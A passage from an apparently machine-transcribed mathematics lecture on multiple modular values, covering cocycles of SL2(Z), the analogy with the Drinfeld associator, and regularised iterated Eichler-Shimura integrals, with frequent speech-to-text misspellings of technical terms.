do by the first point is, use the fact that gamma is the risky dense in the Bettei relative completion. So we have a map from SL2z into the q points of the Bettei relative completion. And then we can apply this comparison map. And that sends us into the complex points of the DRAM relative completion. And in fact, we know by definition of r that it necessarily lands in MMV gamma. That's the definition of MMV gamma, so that's more string, so this is true. And this map is the risky dense. So that means these numbers are going to be generated by the images of elements in SL2z. Now gamma was just the topological fundamental group of M11 with respect to a tangential base point, which I defined last time, d by dq, which I sometimes also call 1 at infinity. It's a unit tangent vector at the cusp. And as you all know, this is generated, SL2z is generated by two matrices, which go by the name of s and t. And these correspond to the module transformations, tor maps to minus 1 of a tor inversion, and t is translation, tor maps to tor plus 1. Okay, so these elements s and t should be thought of as paths in M11, in the complex points of M11. So let's look at that. So for t, it all takes place in the q-disc. So if this is a picture of the q-disc, I remind you that q equals e to the 2 pi i tor, then it's punctured at the origin, and our base point was this tangent vector d by dq. And so the path t can be represented as a path that goes along this tangent vector and loops once in the positive direction around the origin, and then comes back along this tangent vector. So that's t. So t is a loop around the cusp. And indeed, it must be by this formula, tor goes to tor plus 1, corresponds to winding around the origin. So how do we think about s? Well, if this is a picture of the upper half plane, then we have the cusp up here, and the tangent vector sticking down like this. Then we think of s as a path from the cusp with this initial velocity, the tangent vector, all the way down to zero. So in fact, as a representative of s, we can just take the imaginary axis. So this picture is slightly misleading, so we're working upstairs in the upper half plane. Of course, on the overfold m11, we should think of this. This is a picture of m11 with the cusp and some tangent vector sticking out. Then s is indeed a loop, because this point zero is equivalent to the cusp zero is equivalent to the cusp infinity. So we should think of s as some sort of path in m11. But when we work on the upper half plane, we shall think of it as a path between zero and infinity. Okay, so because sl2z is the risky dense and is generated by s and t, it turns out, as we shall see, that the ring of multiple modular values is generated as a ring by the coefficients of the image of t and s. So by that I mean we have these matrices t and s which live in sl2z, and the image is some element of this group and the coefficients are certain numbers. So it turns out the coefficients of t are very uninteresting. So this is just powers of 2 pi i, though the element t itself is very important. This only produces powers of 2 pi i. So all the information then is contained in this single element s. So that's the interesting part. Before proceeding with this, let me just give something more familiar because by now it's increasingly well known. And explain the analog in the case of p1 minus 3 points, just so that we get our bearings. Now this case is very slightly different because we're not looking at the fundamental group but the groupoid. So we're going to look at paths from one point to a different point. We could take paths based at a single point, in which case it would be very much closer to the M11 picture, but I hesitated to do that because I think the path torsor is actually the more well known setting. So let me explain that. So here on M04 we have the base points that one takes are the tangent vector 1 at the origin and the negative unit tangent vector at the point 1. Of course these are not drawn to scale, of course. So the topological, so not fundamental group but homotopy classes of paths from this tangent vector to the other tangent vector is what I just said. So these are homotopy classes of paths from 0 to 1 essentially. There are a couple of paths that play a key role. Well there's one path that plays a very crucial role. So we have this picture, make it a bit bigger. Then there is the so-called DCH, droit chemin, the straight path from, so straight line from 1, 0 to minus 1, 1. So it's really literally the map from the unit interval into C minus 0, 1, the open interval into this along the real axis. So it just goes along with unit speed here and comes in unit speed here. That's indeed a path between two tangential base points because its initial velocity is 1 and its final velocity is minus 1 coming in. So there's another path that plays a role here. So you could take DCH but you could pre-compose it with a loop around the origin. So you could look at gamma naught. You could go around a loop around the origin and then go to 1. That's another example of a path. And DCH, so in M11 the straight line path is played by S and the role of this little loop here is played by T. So in this setting we work with unipotent completion. So the Betty torso of paths from 0 to 1 is the unipotent completion. So this is unipotent completion and the diram version of the unipotent completion. The same thing. So this can be described quite explicitly. Let me put them over here. So the... So OPI1 Betty is a scheme and its R points are a commutative Q algebra. So this is a scheme of a Q. Its R points are given by the set of group-like formal power series. So this is an invertible power series in two non-commuting variables which satisfy some algebraic equation. So I wrote this down in the first lecture I think. Group-like formal power series. So we have delta of xi equals 1 plus... oops... 1 tensor xi plus xi tensor 1. And the diram... the affine ring of the diram torso of paths is really the Q vector space generated by words in two non-commuting letters, E0 and E1 where E0 corresponds to the differential form dx over x and E1 corresponds to dx over 1 minus x. So I don't want to give an entire course on P1 minus 3 points but this is just to fix ideas and to have a concrete analogy. In this setting we have a very, very similar setup. The topological fundamental groupoid, the space of homotopy classes of paths, maps into the Betty fundamental torso of paths more precisely into its rational points and then we have a comparison isomorphism. So here I forgot to say exactly as in as before we have 0 pi 1. We have a comparison isomorphism. So then this goes to 0 pi 1 into its complex points. So it's the exact analogy of what I mentioned earlier and what this does is it takes this straight line path which is just a path from 0 to 1 and it sends it to something over here which is very famous which is the Drinfeld Associator. So concretely the Drinfeld Associator can be written down at least formally. So it is again a formal power series indexed by words in E0, D1 and then the coefficient of each word is what's called a shuffle regularized multiple zeta value and this is a formal power series in two letters E0, E1. And we know what it looks like it starts off 1 plus zeta 2 E0, E1 minus E1, E0 depending on certain sign conventions, etc. It goes on forever and it can be viewed as the generating series of multiple zeta values. So after that long digression I hope that motivates exactly what's going on in this picture for M11. We've got exactly the same situation, the small difference that we've got the fundamental group with respect to a base point and not a torsor of paths. In that respect it's simpler. So the element t, or rather the image of the element t over here is really the same element as this gamma zero here. It's just a loop around the origin. So t only produces powers of 2 pi i but it's very important. I'll just say this because I might not have time to explain it. It's some kind of non-Abelian analog of the pizza in a product. In a product on modular forms. And in principle we can determine its image completely. So it can be computed completely. The M and S on the other hand we should think of as the analog of the Drinfeld Associator. In fact they're related in some way for M11. In the same way that the Drinfeld Associator, its coefficients generate multiple zeta values, the coefficients of this gadget generate multiple modular values. But it's much, much, much richer than the Drinfeld Associator. Much more complicated beast. So now I want to explain relations between these numbers. As I progress it will become more and more concrete. So for the Drinfeld Associator it's well known that it satisfies the associated relations, namely the hexagon and pentagon relations. And so I want to write down an analog of that for M11. And so these are co-cycle relations. So we had this exact sequence, unipodent radical, where dot is either betty or diram relative completion. And in particular the comparison isomorphism restricts to what induces a comparison between these copies of SL2. So let me write that down explicitly and dispense with it. So SL2 betty as I mentioned before is just SL2. It's just a label and same with SL2 diram, it's also just a copy of SL2. But the isomorphism is non-trivial. So on the level of points, if I take a matrix A, B, C, D, then what this does is it maps it to another matrix, what I'll call gamma bar. And it multiplies B by 2 pi i and C by 2 pi i inverse. And so this is a minor detail that can be ignored as a first approximation, but it's very irritating if you don't distinguish betty and diram copies of SL2, otherwise you get yourself into a pickle. So it's important to bear this in mind. The reason for this will become clear when I talk about the underlying hot structure. Fundamentally, this SL2 acts on the H1 of the Tate elliptic curve and that H1 is a copy of a Q of 0 and a Q of minus 1. And that explains this 2 pi i sneaking in. Okay, so now to proceed, we have to choose a splitting of one of these short exact sequences. Here we mentioned in the JSL2 part what is the order of part of C. So this is on points. So what I've done is I've written it down on complex points. Here this is a point in SL2, betty bracket C and I've written down its image in SL2 diram bracket. This is a product of schemes, but to write this down, you can write down what this is on the affine ring. Exactly, but I've just written it on points. So now let's choose a splitting of this diram exact sequence. So this is possible on the level of points by Levy's theorem or version of Levy's theorem. You can always split such a short exact sequence of algebraic groups, schemes on the level of points and on the level of actual group schemes. This is a theorem due to Mostow. So what we have then is we're looking at this exact sequence and we're going to choose a splitting. So what that means is we're going to write G11 diram is isomorphic to SL2 diram U11 diram. So this means I'm viewing SL2 acting on the right. It's a right action on the right of U11 diram. So this splitting is non-canonical. It depends on some choices, unfortunately. I do not believe that there is a canonical such splitting. Okay, so now we do the same thing. We rewrite this map. So we had gamma SL2z going into G11, the rational points of G11 betty. By the comparison, this gives a map into the complex points of G diram. And then we've chosen our splitting to rely on in the complex points of this semi-direct product. And what that does, it takes a matrix gamma in gamma and it maps it to, in the first component, it maps it to gamma bar, which is essentially the same matrix gamma, but with this irritating 2-poise creeping in. And something else that I'm going to call c gamma. And of course, the ring of multiple modular values are generated by the coefficients of the c gammas for all gammas, or all elements gamma in the group SL2z. So this map is a homomorphism. And so that's equivalent. It's equivalent to a one-line calculation that this is equivalent to the equation Cgh equals Cj slash h. This slash is my notation or the standard notation for a right action times Ch, where the multiplication takes place in u. So this is holds for all gh and gamma. So this is an equation which defines a non-Abelian group co-cycle. And as a result, it gives quadratic relations between the coefficients of these elements. So let me briefly remind you some notation concerning non-Abelian group cohomology. So this is a digression. So if we have a group g, any old group g, acting on a non-Abelian group, so my notes are called a stupidly, but it's not necessarily a belian on a non-Abelian group, say group scheme for example, then the set of co-cycles z1ga, the set of non-Abelian co-cycles is the set of maps from g into a satisfying precisely this equation. So here my actions on the right for left action and formulae are very slightly different. So such that Cgh equals Cg slash h Ch. So that's the definition of a non-Abelian group co-cycle. And there's an equivalence relation on these. So this is a set, it's not like group co-cycles on an Abelian group, there's no group structure here, this is just a set and it contains a distinguished element, which is the trivial co-cycle where g goes to the identity, every element of g goes to 1. So it's just a pointed set, but on that pointed set there's an equivalence relation. So we say that two non-Abelian co-cycles are equivalent if they differ by co-boundary. So that means if there exists a b in A, an element b, such that C prime g equals b inverse, slash g Cgb for all g and g. And if I didn't mess up the formula you can check that C prime defined in this manner, that any C prime defined in this manner by twisting varn element b indeed satisfies this co-cycle equation. So that's an equivalence relation and we say that something is a co-boundary if it's equivalent to the trivial co-cycle. In that case it would be the co-cycle given by g maps to b inverse slash gb for some b. It's indeed a group action of a on the right. Exactly, yes. Absolutely, so and then you're right, so h1 is the quotient. So I won't use this so much this time. Modular equivalence relation and we think of this as a base and z1 as a total space over h1 and the fibres as you say admit an A action. And that's a good way to think about it. And then the final mock I want to say is, which is very well known, is that this space of co-cycles can be interpreted as just a hom. So if you, in fact I've already used it up here, so z1ga is canonically in bijection with the group homomorphisms from g into, group homomorphisms from g into the semi direct product of g with A, which are the identity on g. So this is maps, g maps to g something and there's something to find the co-cycle. So we've already used this to define the co-cycle that we're interested in. So that's a very easy thing to prove. Okay, so by this final remark, the non-Abelian co-cycles are simply the homomorphisms of the group. And since we have a presentation for SL2z, what's it called, here, then we can explicitly write down all these, all the equations, all the necessary and sufficient equations for c to be a group co-cycle. So the first remark is that minus one in gamma acts trivially. And that's going to imply that, so it's very easy to show that the co-cycle evaluated on the element minus the identity is going to be trivial. And this is also related to the fact that the local chart on M11 was the stack quotient of the punctured disk by plus or minus one. And it's also related to the fact that there are no modular forms of odd weights for SL2z. So that's different ways you can think about this fact, but c of minus one is one in this business. And now that means we're really interested, we've really got a co-cycle of gamma modulo plus or minus one, also known as PSL2z. And this has a presentation, so the image of s in this quotient satisfies s squared equals one. Maybe I'll put congruent to one just to emphasize that this identity is in the quotient. The matrix s itself literally satisfies s squared equals minus one. And it satisfies, and likewise, u cubed equals minus one, so u cubed is congruent to one, where u is the element t dot s, which is one minus one, one zero. So from this presentation, it means that we get an immediate crollery that this co-cycle equation, which is up here, so let me call it something, dagger. I can leave this down here. So the co-cycle equation dagger is equivalent to, well, first of all, by definition c, it's literally saying that c is an element, a non-Libyan co-cycle of SL2z in u d around one one c. And that's in turn equivalent because we have this explicit presentation, and by this remark, that to define a homomorphism on the group, it suffices to define it on generators, satisfying equations given by the relations. You immediately get the ss s bar times cs equals one, and I might run out of room. Let me squeeze it in here, and we get cu bar squared cu bar cu equals one. So we get these two equations coming from this presentation, and where cu equals ct slash s bar cs. So there we see very explicitly that the value of the co-cycle on any group element is completely determined by its values just on s and t, s and t are generators, so you have to just specify two elements in u11 d around s, c, s and ct, and you've got a co-cycle if and only if these three equations are satisfied. And so these are a complete set of equations, and they imply relations between multiple modular values. And the important thing to remark is that, again, I said this before, that ct, we essentially know it completely. It just involves two pi i's, so you think of ct as being known somehow, you can view this as a system of equations satisfied by cs. All right, so now we want to actually compute something. So we have some relations satisfied by these numbers, so essentially it's as if we've written down formally what z is, and we know some equations satisfied by its coefficients. So we now want to actually try to compute some integrals and get a grip on some of the coefficients explicitly. Sorry? These relations are the equations. Which relations are they between the n and the n? So the co-cycles give relations, but they're not the only relations. So there are some other relations that we know that a sense of the form, a certain combination of mmv's are multiple zeta values. And the reason for that is because there's a geometric reason, which I haven't talked about, which is that approximately these group schemes act on the fundamental group of the punctual elliptic curve, which is a mixtape motive. That mixes in multiple zeta values into this picture in some complicated way and gives some other relations. But we don't know, but still, even throwing that into the mix, we still don't know all the relations. And there seems to be a lot more we don't know really where they come from. This is already a very, very strong constraint, though. It's very powerful as it is. So I'll say some more about that actually later on. But even more fundamentally, the difference here is that every period, every coefficient here can be written down as an iterated integral of some differential forms along this path dCh from 0 to 1. And unfortunately, in the case of SL2z, you can't do that explicitly in all cases. So you can only do that for a certain piece of the relative completion. And so let me explain what that is and how that works. So periods and what I call the totally holomorphic or sometimes just the holomorphic quotient. OK, so the issue here is that there is no explicit description of the affine ring of OU11 diram. So these would correspond to differential forms, or iterated integrals in differential forms, that we would then integrate along S, from 0 to infinity. And they would give numbers. And that's the analog, so I just erased it. But in the case of P1 minus 3 points, this was very explicit. It was just a tensor algebra on two generators corresponding to dx over x and dx over 1 minus x. The reason why there's no explicit description, so we can write down descriptions of this, but it's not explicit because there are essentially non-trivial massy products in this business. And the non-trivial cut products, and you have to choose a sort of system of massy product. You have to construct some kind of minimal model to do something explicit here. So that's a bit of a pain. There's some recent progress by Marleau in his thesis on how to write down, how to explain this in terms of certain complexes. But it's not going to be as nice as P1 minus 3 points. We can just write down a basis completely explicitly. And I don't know if there's some natural choice of a system of higher massy products in this setting, which would solve this issue. We don't know that yet. But what we can do for now, we can define, we can describe a piece of this, which I like to call the totally holomorphic quotient. So what that is is, so we have u11 deram, and it has some quotient u11 deram whole. Now, informally, u11 deram, or its Lie algebra, was generated by some Eisenstein classes, and then two generators for every cuss form, EF prime and EF double prime. And here, informally, this is generated by throwing away the EF double prime, and just keeping the Eisenstein classes and the holomorphic part of the modular generators. So this, I have to say some words, this is not motivic. So this u11 deram does come from algebraic geometry, and it has a mixed-hot structure. But this thing does not. It's just a, it's a deram thing, only exists in the deram realisation. So it is not motivic in whichever sense you wish to interpret motivic, in any reasonable sense. For example, it does not have a mixed-hot structure, or it does not have a Betty analog, or a Betty analog. So it's defined in terms of the Hodge filtration. In fact, you can define it as the, I haven't spoken about the Hodge structure on this yet, but you can just define it to be the quotient by the normaliser of F0, where F is the Hodge filtration on u deram. Okay, but it turns out that this thing can be written down explicitly, and its periods can be written down explicitly. So let's do that now. So what that means, I forgot to write the line, so what that means is that this is some subring, O u11 deram whole is some subring inside u11 deram, and it has a completely explicit description. And this is going to give us differential forms that we can then integrate along S and T. What is the path, first one into S? You can't sit on the disk because it leaves the disk and goes on a big detour and comes back into the disk. The disk is just sort of something local up here. So now let me describe, so we're going to get more and more concrete as the lecture progresses. So recall some notation. We had a vector space Vn deram, which was a certain algebraic vector bundle, which was the nth symmetric power of the H1 of the universe elliptic curve at the fiber d by dq. So it's just a vector space and we can choose, we have a set of generators, X, the I, that I'm going to denote by a blackboard, bold, X and Y. And this has a right action of gamma. And in fact we already saw this, the Betty version, which was the fiber of this canonical local system at the same tangential base point was, sorry, messed this up. This is a direct sum Q, right? So it's just a vector space of homogeneous polynomials in two variables of degree n. And this we definitely saw was this vector space with the right action of gamma. And the point of having these different notations is because SL2, Betty and SL2, deram are not quite the same when the compression isomorphism has this factor of 2 pi i. So this is just to keep track of that and Y corresponds to 2 pi i, Y and X corresponds to X. So as a first approximation you can just ignore this distinction between X's and Y's and just take the standard Betty, X and Y in the modular forms literature. But if you actually want to work here you have to be very careful with these different normalizations depending on where you're working. This is due to the comparison, this is exactly the comparison morphism between SL2, Betty and SL2, deram. It's completely equivalent. I don't want to dwell too long on this, it's really trivial but it's just important to do things carefully otherwise things become incredibly confusing and none of the hot-stereo works out if the weight is all wrong. So now let curly Bn be a Q basis for the space of cusp forms of weight n with rational Fourier coefficients. So I call this Sn in an earlier lecture. So then we can write down this thing explicitly, it's just a tensor algebra. So then the affine ring O U11 dr whole is nothing other than the tensor co-algebra generated on the Q vector space generated by certain symbols. The definition is it's just the tensor algebra on a space of modular forms but it's nice to write down a basis to do computations. So having chosen a basis, this can be made very concrete, we have symbols E2n plus 2x to the Iy to the j where I plus j equals 2n and these correspond to all n beginning with a 1. So these correspond to Eisenstein series and so E4, E6, etc. And then we have the cusp forms, before we had two genuges EF prime and EF double prime, one corresponding to holomorphic modular forms, the other weakly holomorphic modular forms. But here we throw out the weakly holomorphic, we just keep the holomorphic part. So we just have a single generator for every cusp form now. So I plus j equals 2n and F a basis element and 2n plus 2. So these are cuspital generators. So tensor coalgebra is just the tensor algebra. So if you have a v of vector space, it's just a Tv is just the direct sum v to the tensor n. Coalgebra means that there's a co-product on it. So precisely we have a basis of, this is a q vector space, the basis is given by words in the symbols, in these symbols. So we take words in these symbols, non-commuting letters, and the co-product is given by deconcatenation. So if you have a word w1 up to wn in certain symbols, then the co-product sends it to the linear combination i equals 0 to n. So here the notation gets a little bit confusing. So what I like to do is if you had a word, for example, e4 x squared and then e6 y cubed or something, then it's convenient because these x and y are the same letter, it's convenient to put a little subscript. So the leftmost one gets a subscript 1 and so the i-th letter gets a subscript i. So that's just a bookkeeping notation. You don't have to do that, but it's just, I like to do this in my papers and I might do it later on. So if you see the subscripts x and y, it's just keeping track of which in which slot, which x belongs to which letter. Okay, so we had this co-cycle gamma going to the full unipotent radical of the DRAM relative completion, and it's dependent on a choice of splitting. And then now we can look at something smaller and look at its image in the holomorphic quotient. And so now we get a new co-cycle. So we had this huge co-cycle, a full co-cycle c, and now we have a smaller co-cycle where we've thrown out a lot of the periods. We've thrown out all the iterated integrals which aren't totally holomorphic. But already this is going to be very interesting. And so what we get from this then is automatically, since this is a group homomorphism, this holomorphic co-cycle is a whole, yeah, sorry, it looks like HD, it's whole, my writing is bad. Yeah, thank you, whole, standing for totally holomorphic. And this gives us a co-cycle in this quotient. And now the point is that, so here's a key point that I can't explain yet without doing some hodge theory. And that's that this co-cycle depended on a choice of splitting of an exact sequence at the very beginning. Now if you choose that splitting to be compatible with the hodge theory and you can do that, then it turns out that this bit, the part on dr-hole, actually splits canonically. So this co-cycle is actually canonical, it does not depend on any choices. And there's a very good hodge theoretic reason for that. So it does not depend on the choice, on any choices of splitting. So provided your initial choice of splitting respected the hodge and weight filtrations, then this is some part in the hodge filtration and it separates things out and the SL2 is just, can be split off very easily. Okay, so this thing is canonical so we can try to hope to write it down. And its coefficients are regularised iterated integrals. Also known as iterated Eichler or Schimura integrals. So what I meant to say was that the coefficients are regularised iterated Eichler-Schimura integrals. So these were defined by Manning a few years ago where there isn't the word regularised, so in the convergent case. So this is something you can write down very explicitly and that's what we're going to do. We could take a break here or we could just press on and finish early depending on what you prefer. Okay, so we'll take a very brief five minute break and then we'll write down some iterated integrals. Okay, so I'll explain now how to calculate these totally holomorphic periods. So first a notation, given a modular form, let me write f underline tau to be 2 pi i f tau x minus tau y to the 2n d tau. If f modular of weight 2n plus 2. So I've been a bit inconsistent over this. Sometimes it's convenient to normalise this by 2 pi i to the power 2n plus 1. Here it's convenient to normalise it just with a 2 pi i. It doesn't make much difference but sometimes I've used this notation to mean something very slightly different. First remark which won't play a role is that if we write this in terms of the parameter q and rewrite these betty generators as diram generators, then this is x minus log q y to the 2n d log q. And so what happens is that the y eats up, eats up the, well all the 2 pi i's get eaten up and you see that this is actually rational. So do we think of f tau is thought of as a section of v 2n tensor omega 1 on the upper half plane. And so every holomorphic model of form gives you some section of this trivial bundle over the upper half plane. We define a one form, a formal one form omega whole to be, so we sum over n. For all cuss forms of weight n we take a basis of cuss forms and we take some symbol for every cuss form and the symbol keeps track of this particular one form. You can do this in a basis free manner but this is convenient for computations. So that's the cuspital part and then the Eisenstein series 2n plus 2, so I should be n beginning with a 1, underline, tau and then we have this Eisenstein, the symbol e2n plus 2. And this is the Eisenstein series that's normalized to have completely rational, so the first coefficient of q is just 1. It has rational q coefficients. Okay so now let me keep that there. Now we can take iterated integrals in that and this was first done by Manin in some two very short but very nice papers a few years ago. So for all two points tau 1, tau 2 in the upper half plane define, so this was done by Manin, i whole, so the integral from, or the transport if you like from tau 1 to tau 2 is a formal power series 1 plus, this plus integral from tau 1 to tau 2, i whole, i whole plus dot dot. And this is a formal power series in, in E f prime, xi, yj, e2n plus 2, xi, yj. So I'm using, I'm mixing metaphors here, I'm taking the Dirac generators but the betty x and y which is not a very hygienic thing to do but it simplifies the formula considerably. So that's why, and it's actually what's done in the modular form literature, it's confusing at first you've got a Dirac generator with the betty guys here. It's just important, that's said once. This is one, it's this formal differential form, yep. It's a formal, it's like an, yeah. So the chain causes a formal power series connection. And this is its transport. So this is non commutative formal power series. So I don't know if this is literally a special case of, of Chen's work on iterated integrals or in the case it's a very slight variant. Because you've got differential forms with values in a, in a, in a vector model, in a trivial vector model. So it's a tiny modification of Chen's general theory in this case. So let me, if you're not familiar with this, let me briefly remind you what an iterated integral is. So this was developed extensively by, by Chen in a long, over many years. And I think in, in the physics literature, it was also considered and bears the name of, bears Dyson's name. Though the theory was really worked out, the vast majority of the foundational work on this was done by Chen. You know, you have the dates, it's 1970, I thought it was earlier than that, but okay. Okay, I take your word for it. And so the, the base code, I'll be very brief because this is very well known. If we take some differential one forms, some smooth one forms, and I can put, you know, if we've got, they could be vector valued in a trivial vector bundle, for example, in, in this case, but it's sections of a vector bundle. It's very, it makes hardly any difference. Smooth one forms on, on a, on a smooth manifold M. We, we give ourselves a path, gamma, let me take an open path. So if you have a smooth path on M, then the iterated integral of this, the sequence of one forms along gamma is defined to be the, physics called the time ordered integral, integral over simplex, Fn, Tn, DTn, where F it is defined, sorry, F it dt is defined to be gamma by star, omega i, for i equals one to N. So what's going on here is that when you've got a smooth map from the interval to M, if you have a one form on M, we can put it back to the interval 01, on which we have the coordinate T. And so any one form on the interval can be written some function times dt. And so what you do then is you take, so this is just omega one written parametrically. The idea is that you, you take a primitive of it, take an indefinite integral from zero to T, then you multiply it by the next, so that's a function, and you multiply it by omega two, and that gives you a one form, you take a primitive of that to get another function, you multiply it by the next differential form, integrate, multiply, integrate, multiply, integrate. So that's the notion of an iterated integral. This is the time order. Exactly, time order. So, so the way I like to think of it is if you have a path integral, you imagine a point traveling along a path, and what's going on here is that you're sort of firing endpoints along a path one after the other, and you're sampling the path as you're sort of firing endpoints in sequential order. Okay, so there's a huge theory here, and I'm not going to go into. A mark, generally, must be defined as your amp-fury for passing for passing. Exactly, yes. Absolutely, yeah. So let me skip that theory because you could be an entire course, and just write down the properties of this particular, this particular instance of a formal power series of iterated integrals. So I should just say briefly that iterated integrals satisfy lots of properties. If you take the product of two iterated integrals along the same path, that can be written as a linear combination of iterated integrals along that path via the so-called shuffle product formula. They're formally for what happens when you compose paths, when you reverse paths, and so on and so forth. So in this case, some of these formally give the following, the point I should make is that in fact, because this form of omega is closed, this path does not depend, this thing does not depend on the choice of path. So it's independent, and because the upper half plane is simply connected, it's independent of the choice of smooth path between tool one and tool two. So it's really a function of the endpoints tool one and tool two. And that's because this differential form is integrable. In other words, it's closed and it's worked product with itself. Vanishes, which is clear because we're on a one dimensional, complex one dimensional space. Okay, so having said that, this is a function of two variables. So I hold the integral from tool zero to tool two is simply the product of non commutative form of power series. Right, then it satisfies a differential equation. So this is i whole omega whole tool one minus omega tool zero i whole t zero t one, tool one, tool one. So when I write omega whole on the side, we think of these symbols EF prime and E2002 as acting via left and right multiplication respectively on formal power series. There are shuffle product identities, which means that if you take any two coefficients of this power series and multiply them together, they can be written as a linear combination of other coefficients. In other words, the vector space generated by the coefficients forms an algebra. And finally something which is some sense new in this situation because it's not a general feature of chance theory, but everything else is what we gain is the action of SL2Z and these integrals are equivariant. So this is the only feature which is a novelty. And the reason for this is because the differential form we're integrating in the first place is itself SL2 equivariant. That's going to be very important. Okay, so now these are some integrals between two points on the upper half plane. Now I want to take one of these points to be the cusp. And things are going to diverge. So we need to do a regularization with respect to the tangent vector at the cusp, which is playing the role of our base point. So now let me explain to you very concretely how to do that. It's very straightforward. So we need to define, and the problem is the cusp forms pose no problem at all because they go to zero very fast in the name of the cusp. The problem of the Eisenstein series, which have a zero-th Fourier coefficient, and that gives you divergence as you go to infinity. So the thing to do is to isolate out this divergence and take what's essentially the residue of this one form in the Q-disc. And as I just said, all the cusp forms drop out. All we get is the zero-th Fourier coefficients of the Eisenstein series. So this is some kind of residue of omega-hole at Q equal zero. So this notation here for any modular form f naught, underline tau, will be defined to be 2 pi i, and then we just take the zero-th Fourier coefficients, x minus tau y, 2nd tau, where f is the a and f are the Fourier coefficients of f. So for cusp form it gives zero, it vanishes all together. And then now for any points tau zero, tau one in c. So here we think of c, the meaning of c is that it's really the tangent space at the origin of the disc. That's the geometric meaning of this c. It's the tangent space to M11 at the cusp, M11 compactified at the cusp. But we can take iterated integrals with these, and let's call that i-hole infinity tau zero, tau one, and it's the same thing. So it's the iterated integrals, but now of this differential form here. So this is something very explicit. We know that the residues, so that the constant terms of the Eisenstein series are just Bernoulli numbers. So omega-hole is some formal power series, some really explicit formal power series whose coefficients are Bernoulli numbers. And so we can put the two pieces together and define the regularized iterated integrals. So define i-hole just of tau, so you can write, if you prefer, you can write this tau comma infinity, but I just write it as tau. And the definition is you take the limit as epsilon goes to the cusp of i-hole tau epsilon times i-hole infinity epsilon zero. So there's a very nice geometric reason for why this formula should be what it is. I've given lectures about this before, and I don't have time here. So let's just take this as a definition. And you can believe me that this converges very nicely as epsilon goes to infinity. Essentially this part sort of cancels out all the divergences in this iterated integral, and it converges extremely fast. So another convenient notation is to write this, to define this to be the iterated integral from tau to the tangent vector at the cusp of omega-hole. So we think of this as a formal power series where we've just taken the upper limit of integration before here, tau-2, to be the tangent vector at the cusp. And this is the definition. That's what this notation means. And from that you can extract very concrete explicit formulae for computing these iterated integrals. So these are the regularised with respect to the tangent vector, the unit tangent vector at the cusp. So this thing now turns out to be the unique solution to a slightly different, essentially the same differential equation, but now it's just a function of one variable. So d of this equals minus omega-hole tau, high-hole tau. And the constant of integration of initial conditions are fixed by the fact that its value at the tangent vector at the cusp is just one. That uniquely determines this power series of iterated integrals. And what the second equation, so this is the same differential equations before, what this condition means, another way to think of it is that there is some sort of regularised limit as tau goes to the cusp at unit speed along this tangent vector. But it tends to, if you regularise it in some way, its limit is just one. Okay, so, off now. This is very explicit and this convergence is exponentially fast. So it's very convenient to compute with just a two or three free coefficients of a modular form. You can get these numbers for any value of tau to hundreds of digits very quickly. So then, how does group SL2Z act? Well, for all gamma we have an immediate property of this uniqueness in this differential equation is this equation c-hole gamma. So you could take this as the definition of c-hole gamma if you're analytically minded. I define it a different way but this is completely equivalent. And so here's the c-hole gamma is a formal power series in these symbols and that's by how I wrote down the definition of diram-hole. You can also think of it as a point in a complex point of this group scheme. So this equation you can check immediately. So if you take this equation and apply it with gamma equals gh and apply it with gamma equals g and gamma with h, then you immediately deduce the co-cycle equations. So that's a very simple exercise. The co-cycle equations for c-hole follow from this formula. That's the definition of c-gamma. Sorry? The first line is the definition of gamma. So I define it as a top-down approach and this is a formula for c-gamma-hole. But you could take it as a definition if you like. This is a perfectly good definition. And so this is Z1 gamma u. Okay, so these iterated integral satisfy shuffle product relations and these co-cycle relations. So in particular they're determined by the value on t and s. So from this formalism you can show that the value on t is in fact it only sees what's happening in the neighborhood of the cusp and it only depends therefore on this, the infinite part of i-hole. So it only depends on this power series here which is obtained by integrating omega-hole. So it only sees the Eisenstein series and it's essentially some completely elementary integral involving Bernoulli numbers. So here you're going to get Bernoulli numbers and here you're going to get products of Bernoulli numbers and then you get products of three Bernoulli numbers, so on. But it's completely elementary and you can compute it explicitly to all orders. So it only involves the residues of the Eisenstein forms and therefore only involves Bernoulli numbers and of course powers of 2 pi i. So we can write this down explicitly. And then sort of the meat is s and again this is mysterious but we can write it using, by messing around with this formula, you can write it down like this. So you can look at just iterated integrals from i which is in the upper half plane to the cusp. So s i equals i, it's a fixed point of the involution s and it's our superfast convergence. Okay so now having written down these holomorphic iterated integrals, I now want to explain, give some examples. And the simplest examples in the case of length one, in other words, is a single iterated integral. And in that case we retrieve the classical theory of periods of modular forms. So I'll dispense with that and then I'll say something about length two. Examples. So the first example is where we just look at a single iterated integral of a cusp form. So it's just a piece of this, the first non-trivial term in this expression. So we take an element in R, this is our basis of cusp forms with rational free coefficients. It doesn't have to be on our basis but it's just convenient. Way two and plus two. And then we can take the coefficient of, so we have this formal power series c whole gamma. So this is some formal power series in all these non-commuting variables. And we take the coefficient corresponding to E f prime. The coefficient of E f prime in this power series is c whole gamma E f prime. That's the definition. That means to take the coefficient of this single letter in this power series. And that's going to define a co-cycle in V2n. And that's going to be an Abelian co-cycle. And the reason for this is if you take my non-Abelian co-cycle equation which I've erased, but it's c whole gh equals c whole g slash h c whole h. And just read off and think about what it means to take the coefficients of a letter of length one. Then what that gives you is exactly the equation c whole gh E f prime equals c whole g E f prime slash h plus c whole h E f prime. So taking off just the linear part, so the terms of length one in this expression essentially abelianizes it. And you get this classical Abelian co-cycle equation. So this is very standard in the third model of forms. So there's a from the general formula we get c whole on s. So the value on t is zero. It's not very interesting. So I should maybe say c t whole E prime f is zero. That follows from this expression here. So it's a hospital co-cycle. And value on s is essentially the integral from s inverse the tangent vector infinity to tangent vector infinity of f tau d tau. But in fact, because this modular form vanishes at the cusp, we don't need to take a tangential base point at all. We can just ignore that fact and take a classical integral from zero to infinity and that's going to be perfectly convergent. So up to some normalization of 2 pi, this is exactly the Eichler integral or Eichler-Schimmer integral. So this is a big subject and it's been studied in great detail. So you can expand this as a polynomial in x and y and you get integrals of f tau times a path tau, which is nothing other than a melanch transform of f. And the melanch transform of a modular form is its l function. So to cut a long story short, you can write this in the form some k equals one to the 2n minus one. Some coefficient, which is elementary and I can't be bothered to write down, times the value of the l function of f at a point k x to the k minus one y to the 2n minus k minus one. And so this is, let's call this pf, which is also called the period polynomial of the cost form f. So up to some even power of 2 pi, there's some normalization. So the l function here was defined by Hecker, let me remind you, lfs is defined to be the sum of the Fourier coefficients of f over n to the s. And this converges for all real part of s sufficiently big and you can be precise about this. So there's something funny about this, the definition of the l function, which always seems very strange. And that it's that you don't, this definition also works for Eisenstein series, but you never take the first Fourier coefficient you take. You start with a one and not a zero. And that's always sort of struck me as being slightly strange because the functional equation for this l function comes from the 